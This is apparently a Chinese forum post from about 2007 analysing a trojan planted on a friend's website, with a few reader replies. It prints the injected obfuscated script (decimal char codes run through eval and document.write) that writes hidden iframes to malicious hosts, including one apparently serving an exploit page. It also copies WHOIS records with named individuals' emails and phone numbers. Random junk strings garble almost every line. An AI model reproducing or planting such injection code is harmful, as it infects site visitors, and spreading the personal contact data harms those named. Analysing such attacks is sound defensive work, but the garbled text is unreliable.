[原创]一篇刚写的分析木马手记

首发在我的博客里面， !nqm ;96  
D|8sjp4  
http://www.areway.cn/?p=175 fS'k;r*r  
)U3 H15  
5r2ctde)Y  
周末上线鸭子就Q我说他的站给挂了马，当时没太注意就直接打开了连接，截下了网页源码： _tWfb}6;Zb  
          )SlUQ7f>  
<script>t=’60,105,102,114,97,109,101, 8/kx3  
32,115,114,99,61,104,116,116,112,58,47,47, HT1dvC$COo  
102,114,101,101,46,117,45,117,117,117,46,99, LmT[N@>"  
110,47,101,114,114,111,114,46,104,116,109, 8{U]ATx'(  
32,119,105,100,116,104,61,49,48,48,32,104, !Barc,kA  
101,105,103,104,116,61,48,62,60,47,105,102, C$]%1<-Iv]  
114,97,109,101,62′; ,sQ0atk7ma  
t=eval(’String.fromCharCode(’+t+’)');document.write(t);</script> Ra15d^  
                                                                                                  o 0cc+  
<script>t=’60,105,102,114,97,109,101,32,115, (,)vak&t  
114,99,61,104,116,116,112,58,47,47,102,114, N";dG 3  
101,101,46,117,45,117,117,117,46,99,110,47, .,BD DPFB  
101,114,114,111,114,46,104,116,109,32,119, $ M[}(m  
105,100,116,104,61,49,48,48,32,104,101,105, A(!ZZ9Wc  
103,104,116,61,48,62,60,47,105,102,114,97, u"
NIG  
109,101,62′;t=eval(’String.fromCharCode(’+t+’)'); )b:~kuHi  
document.write(t);</script> +X|m>9  
                                                                                                  Wvzzjcr(j  
<html xmlns=” N4JqW  
http://www.w3.org/1999/xhtml Q,`2DHhK  
“> v1tN DyM6  
<head> 6{,K7FL  
<!– Published By Newasp.cc 2007-12-7-18:03:23 –> }G:uzud10  
<meta http-equiv=”Content-Type” content=”text/html; charset=gb2312″ /> y9l.i@-  
<title>首页 - 爱生活家庭网  h(N9RJ}  
                                                                                                                                                    J=Y( *D7Q  
上面有一段 script的十进制加密字段，里面的大概内容是，把所有的字符放在函数t里面，最后用doucment.write(t)来把字符串写在网页里面。 [?K\%]  
转换字符串后的大概内容是（谁点击后果自付）： ]oWZ{#r2  
<script>t=’<iframe src=http://free.u-uuu.cn/error.htm width=……… :6Pc m3  
                                                                                                                                  #|*,zIYo  
查询玉米u-uuu.cn的详细信息： Qi'WV9ke  
Domain Name: u-uuu.cn M b /X@51  
ROID: 20070901s10001s64972306-cn $'mB8 S  
Domain Status: ok Ubos#hP  
Registrant Organization: 王雷 gPhw.e""  
Registrant Name: 王雷 +e3WwU
x  
Administrative Email: czlovexs@126.com
po](6V  
Sponsoring Registrar: 北京万网志成科技有限公司 { ves@p>?  
Name Server:ns.yovole.com 35]G_\  
Name Server:ns1.yovole.com {dr&46$p  
Registration Date: 2007-09-01 17:54 zL!~,B8C  
Expiration Date: 2008-09-01 17:54 =='{[[J  
最后PING了一下地址 都没有什么….  lN`_0  
                                                                                                Dy!bj  
上虚拟机里面继续分析，IE里面打开上面的连接…查看源代码…..直接又有嵌套. 5}l#zj  
<iframe src=http://www.foafau.info/ms15.htm width=1 height=1></iframe> 4>wIF}\  
<script language=”javascript” src=” lVp~oZC6[  
http://count43.51yes.com/click.aspx?id=4333375720&logo=6″></script h9OL%n 7m'  
> 0)]C&;}_M  
这个玉米应该有可能是木马作者的： E(4lu%  
foafau.info的详细信息： ^*UfCoj9Z  
Access to INFO WHOIS information is provided to assist persons in  W$VCST  
determining the contents of a domain name registration record in the ]OCJ~Zw  
Afilias registry database. The data in this record is provided by -L4G WJ~.-  
Afilias Limited for informational purposes only, and Afilias does not Hpo?|;3D5  
guarantee its accuracy.  This service is intended only for query-based }+RF~~H/  
access. You agree that you will use this data only for lawful purposes K7R])*B.~  
and that, under no circumstances will you use this data to: (a) allow, 3K20f8g  
enable, or otherwise support the transmission by e-mail, telephone, or w)y9!li  
facsimile of mass unsolicited, commercial advertising or solicitations SAo
\H  
to entities other than the data recipient’s own existing customers; or LkZo/K~  
(b) enable high volume, automated, electronic processes that send He_(JXTP  
queries or data to the systems of Registry Operator, a Registrar, or ';CuJXAj  
Afilias except as reasonably necessary to register domain names or [+cnx21{  
modify existing registrations. All rights reserved. Afilias reserves i7!mMO8]  
the right to modify these terms at any time. By submitting this query, ZT6X4 Z  
you agree to abide by this policy. :iOHc-x
 
Domain ID:D22418703-LRMS gW pT:tX-  
Domain Name:FOAFAU.INFO 0gb]Kjx  
Created On:20-Nov-2007 16:05:42 UTC ;>8TNB e!  
Last Updated On:20-Nov-2007 16:05:44 UTC $^D(%  
Expiration Date:20-Nov-2008 16:05:42 UTC (>5VS  
Sponsoring Registrar:GoDaddy.com Inc. (R171-LRMS) Jc#)T;#6  
Status:CLIENT DELETE PROHIBITED *Wo$$T  
Status:CLIENT RENEW PROHIBITED /E  yg*#  
Status:CLIENT TRANSFER PROHIBITED ?m r@B
 
Status:CLIENT UPDATE PROHIBITED "M#`y!__  
Status:TRANSFER PROHIBITED W;}u 2GH  
Registrant ID:GODA-040110615 }GNH)-AG)$  
Registrant Name:liu hong n; '~"AG)  
Registrant Organization: 0N[DV]  
Registrant Street1:beijing .yh2ttf<gB  
Registrant Street2: {S:3 FI  
Registrant Street3: ^?.:}  
Registrant City:beijing ]\mb6Hc  
Registrant State/Province: P;
o>~Y>x  
Registrant Postal Code:100000 +FKP5L
}  
Registrant Country:CN BNoCE!  
Registrant Phone:+86.860108888777 .q[sk  
Registrant Phone Ext.: W]Y!ZfGnN  
Registrant FAX: LW 3J$Am  
Registrant FAX Ext.: gsq[ 9  
Registrant Email:bbbshiji@163.com f(MHU   
Admin ID:GODA-240110615 ~U*N'>'=)  
Admin Name:liu hong VGUDUM.8  
Admin Organization: .VEfd4+ni{  
Admin Street1:beijing e4H0<h }{  
Admin Street2: MdboWE5i  
Admin Street3: M|kDys  
Admin City:beijing o[r6sz:  
Admin State/Province: Olh%"=*;  
Admin Postal Code:100000 wQuaB6E  
Admin Country:CN sU_4+Mk  
Admin Phone:+86.860108888777 ]fS~N9B  
Admin Phone Ext.: )"3oe?  
Admin FAX: ,) jB<`  
Admin FAX Ext.: x4A~MuGU  
Admin Email:bbbshiji@163.com `lh?Z3W  
Billing ID:GODA-340110615 K]*ERAfM%m  
Billing Name:liu hong lGBdQc]IL  
Billing Organization: ITqigGan%  
Billing Street1:beijing bme#G
{[)Y  
Billing Street2: mb`}sTU).  
Billing Street3: w8#>xV^~  
Billing City:beijing y\|\9Q%D  
Billing State/Province: |oi49:NXn  
Billing Postal Code:100000 v6Wf7)d/1  
Billing Country:CN VRP.tD  
Billing Phone:+86.860108888777 [gr[0aGBc  
Billing Phone Ext.: k*6eZ7  
Billing FAX: N$\5%  
Billing FAX Ext.: Kf<_A{s  
Billing Email:bbbshiji@163.com ea}KxLC`,  
Tech ID:GODA-140110615 ;|1P1H-W~M  
Tech Name:liu hong R$m?&1K  
Tech Organization: /,%o<Ql9  
Tech Street1:beijing ~e~Mx=FT0  
Tech Street2: x(N}^Hu  
Tech Street3: X.Y)'qSf  
Tech City:beijing R*G>)YH  
Tech State/Province: /Z_ [)PTH  
Tech Postal Code:100000 dY`J,
s  
Tech Country:CN Ijro;rsEKM  
Tech Phone:+86.860108888777 PCnJ2  
Tech Phone Ext.: E1w XG  
Tech FAX: D)cwttH  
Tech FAX Ext.: ZGvNEjff  
Tech Email:bbbshiji@163.com y'wW2U/1-  
Name Server:NS27.DOMAINCONTROL.COM neH"ks5  
Name Server:NS28.DOMAINCONTROL.COM S2SQ;s-t_  
Name Server: uQ+$HzxX  
Name Server: 19`0)pzZ*P  
Name Server: JN-8\L  
Name Server: U*h)nc  
Name Server: \eN/fTPm  
Name Server: ?|YQtY  
Name Server: MdjMTe s  
Name Server: ZP/=R<<  
Name Server: F>R)~;Ja  
Name Server: /`@>v$oo  
Name Server: Fpwh.R:yV  
                                                                                                          S$/3Kq  
接着下载每个文件里面的代码： t^;Fq{>  
一步一步看.. T=Q{K|JE  
$oj<yH<i  
O~]G(TMs8W  
&}=,8Gt1G  
{moNtzE;  
,OAWGFKOp  
都是十进制的代码，也懒得再分析了，有这个爱好的大家可以继续试试

要是有全部 就好了 传上来

看过了就是没看懂。。。